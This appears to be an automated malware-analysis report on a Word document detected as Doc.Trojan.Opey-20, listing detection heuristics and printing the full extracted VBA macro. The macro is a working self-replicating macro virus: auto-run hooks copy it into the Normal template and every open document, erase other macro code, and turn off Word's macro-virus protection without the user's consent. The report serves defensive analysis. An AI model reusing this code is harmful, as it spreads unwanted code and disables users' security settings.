MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is identified as malicious by ClamAV with signatures 'Doc.Trojan.Opey-20' and 'Win.Trojan.C-286'. It contains a legacy WordBasic macro and VBA macros, including an AutoOpen macro, indicating a potential for automated execution upon opening. The extracted VBA script, named 'JiShenhua3', appears to be designed to immunize the system by deleting other macro modules, which is a common tactic used by malware to evade detection or remove competing malware.
Heuristics 5
-
ClamAV: Doc.Trojan.Opey-20 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Opey-20
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.VBComponents(I).CodeModule.DeleteLines 1, LinesofCode -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6920 bytes |
SHA-256: 8dd7dc95782f5aed83ea82cea6d315bba2a9080f6977833b4ddb9b3c7f1ae582 |
|||
|
Detection
ClamAV:
Win.Trojan.C-286
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "JiShenhua3"
' ------------------------------------------------------------------------------------
' 原作: FoxChit SOFTWARE SOLUTIONS
' 作者: Ulysses R. Gotera
' 程序改进: 冀慎华
' 日期: 2001年3月
' 功能: 该程序把WORD菜单与工具条初始化到原来状态并删除本模块以外的宏模块.
'-------------------------------------------------------------------------------------
Sub Immunize()
On Error Resume Next
Dim DocuName$, OpenDocImmunized As Boolean
Dim I%, J%, NmImmunized As Boolean
Dim LinesofCode As Integer
Dim openDoc As Document
NmImmunized = False
For I = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
DocuName = NormalTemplate.VBProject.VBComponents(I).Name
Select Case DocuName
Case "JiShenhua3"
NmImmunized = True
Case "ThisDocument"
LinesofCode = NormalTemplate.VBProject.VBComponents(I).CodeModule.CountOfLines
If LinesofCode > 0 Then
NormalTemplate.VBProject.VBComponents(I).CodeModule.DeleteLines 1, LinesofCode
End If
Case "VirusReport", "JiShenhua" '旧版本杀病毒程序
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, Name:=DocuName _
, Object:=wdOrganizerObjectProjectItems
Case Else
msg = "你的 Word 系统中附带有宏程序模块 " + DocuName + _
", 极有可能是宏病毒,请选择 '是' 清除该病毒."
If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then
Application.OrganizerDelete _
Source:=NormalTemplate.FullName, Name:=DocuName _
, Object:=wdOrganizerObjectProjectItems
End If
End Select
Next I
For Each openDoc In Documents
OpenDocImmunized = False
With openDoc
For J = openDoc.VBProject.VBComponents.Count To 1 Step -1
DocuName = openDoc.VBProject.VBComponents(J).Name
Select Case DocuName
Case "JiShenhua3"
OpenDocImmunized = True
Case "ThisDocument"
LinesofCode = openDoc.VBProject.VBComponents(J).CodeModule.CountOfLines
If LinesofCode > 0 Then
openDoc.VBProject.VBComponents(J).CodeModule.DeleteLines 1, LinesofCode
End If
Case "Reference to Normal"
Case "VirusReport", "JiShenhua" '旧版本杀病毒程序
Application.OrganizerDelete Source:=openDoc.FullName, _
Name:=DocuName, Object:=wdOrganizerObjectProjectItems
Case Else
msg = "您的文件 <" + openDoc.Name + "> 中附带有 Word 宏模块 " + DocuName + _
", 极有可能是宏病毒,请选择 '是' 清除该病毒."
If MsgBox(msg, vbYesNo, "冀慎华向您报告:") = vbYes Then
Application.OrganizerDelete Source:=openDoc.FullName, _
Name:=DocuName, Object:=wdOrganizerObjectProjectItems
End If
End Select
Next J
If Not OpenDocImmunized Then
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=openDoc.FullName, _
Name:="JiShenhua3", _
Object:=wdOrganizerObjectProjectItems
' If Not openDoc.Saved Then openDoc.SaveAs FileName:=openDoc.FullName
End If
End With
Next openDoc
If Not NmImmunized Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="JiShenhua3", _
Object:=wdOrganizerObjectProjectItems
If Not NormalTemplate.Saved Then NormalTemplate.Save
End If
End Sub
Sub Initialize()
On Error Resume Next
Application.DisplayAlerts = wdAlertsAll
WordBasic.DisableAutoMacros -1
With Application
.UserAddress = "冀慎华已为您的机器自动安装了反宏病毒程序,事前未征求您的同意,请见谅."
End With
With Dialogs(wdDialogFileSummaryInfo)
.Comments = "该文件已附带了冀慎华编写的反宏病毒程序,事前未征求您的同意,请见谅."
.Execute
End With
With Options
.ConfirmConversions = True
.VirusProtection = False
.SaveNormalPrompt = False
End With
With ActiveDocument
.ReadOnlyRecommended = False
End With
With CommandBars("Visual Basic")
.Enabled = True
.Protection = msoBarTypeMenuBar
.Protection = msoBarMenuBar
End With
With CommandBars("Tools")
.Reset
.Controls("Macro").Reset
.Controls("Customize...").Reset
.Controls("宏(&M)").Reset
.Controls("自定义(&C)...").Reset
End With
FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Clear
FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Clear
CustomizationContext = NormalTemplate
End Sub
Sub AutoExec()
On Error Resume Next
Call Initialize
Call Immunize
End Sub
Sub AutoNew()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileNew).Show
Call Immunize
End Sub
Sub FileNew()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileNew).Show
Call Immunize
End Sub
Sub AutoOpen()
On Error Resume Next
Call Initialize
Call Immunize
End Sub
Sub FileOpen()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileOpen).Show
Call Immunize
End Sub
Sub FileSave()
On Error Resume Next
Call Initialize
Call Immunize
If Not ActiveDocument.Saved Then ActiveDocument.Save
End Sub
Sub FileSaveAs()
On Error Resume Next
Call Initialize
Call Immunize
Dialogs(wdDialogFileSaveAs).Show
Call Immunize
End Sub
'Sub FileClose()
'On Error Resume Next
' Call Initialize
' Call Immunize
' If Not ActiveDocument.Saved Then ActiveDocument.Save
' ActiveDocument.Close
'End Sub
'Sub FileExit()
'On Error Resume Next
' Call Initialize
' Call Immunize
' If Not ActiveDocument.Saved Then ActiveDocument.Save
' FoxChitForm.Show
' Application.Quit
'End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.